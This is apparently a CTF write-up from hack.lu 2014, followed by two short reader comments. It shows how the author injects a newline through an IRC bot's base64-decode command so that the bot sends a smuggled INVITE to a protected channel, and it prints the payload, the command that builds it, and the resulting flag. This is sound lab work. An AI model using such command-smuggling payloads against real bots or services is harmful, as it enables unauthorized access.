There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!
Legend:
hhby1 – me, barmixing-bot – barmixing-bot :)
hhby1: !help
barmixing-bot: Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list
hhby1: !status
barmixing-bot:
My name is barmixing-bot, my uptime is 0 hours 40 minutes and 33 seconds. I am on the following channels: #hacklu-saloon, #hacklu-secret-channel, #new_chan2
So, we need to connect to a passworded channel #hacklu-secret-channel. To do this, you should either find the password, or ask for a bot that he invited us. I chose the second way :) IRC protocol based on one-line commands, so we can’t send multiline messages or something like that. We can inject one more command by forcing bot to send \n character to the server and !base64d command can help us.
➜ ~ echo -e "hello\nINVITE hhby1 #hacklu-secret-channel\n" | base64 aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg==
hhby1: !base64d aGVsbG8KSU5WSVRFIGhoYnkxICNoYWNrbHUtc2VjcmV0LWNoYW5uZWwKCg==
barmixing-bot: hello
* barmixing-bot invites you to channel #hacklu-secret-channel
Topic for #hacklu-secret-channel: FLAG: GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH
Topic for #hacklu-secret-channel set by [email protected] at 12:41:54 on 10/18/14
24.10.2014 at 05:10
that’s a really nice solution, however my IRC client just show the topic for #hacklu-secret-channel with /LIST command :)
ping me please i want to join your team for the next CTF
24.10.2014 at 08:35
That’s because +s flag unset after ctf :-)
Okay, I’ll ping you